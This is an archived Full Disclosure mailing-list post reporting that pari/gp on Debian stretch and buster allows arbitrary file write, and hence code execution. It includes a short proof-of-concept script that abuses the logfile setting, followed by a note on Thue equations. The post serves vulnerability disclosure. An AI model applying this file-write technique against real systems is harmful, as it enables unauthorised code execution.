| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAGUWgD96pYn+utXY_7v3CogGyCQu6yEpe44sOtxfkS9QsVWUxA@mail.gmail.com>
Date: Tue, 26 Nov 2019 12:39:14 +0200
From: Georgi Guninski <gguninski@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] pari/gp on debian stable allow arbitrary file write
pari/gp on debian stable allow arbitrary file write
pari/gp is CAS (computer algebra system).
pari/gp version 2.9.1 on debian stretch and 2.11 on debian buster
allow arbitrary file write and hence arbitrary code execution.
poc:
========
\\ a.gp
\\ to run: \r a.gp
default("logfile","/tmp/a.txt");default("log",1);print("log(1)");
========
Of mathematical interest is pari was missing solutions
to Thue equations when assuming GRH (the fix changed polynomial
bound to exponential bound):
http://pari.math.u-bordeaux.fr/archives/pari-dev-1207/msg00000.html
t=thue(thueinit(x^3+92*x+1,0),3^3);t
--
CV: https://j.ludost.net/resumegg.pdf
site: http://www.guninski.com
blog: https://j.ludost.net/blog
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists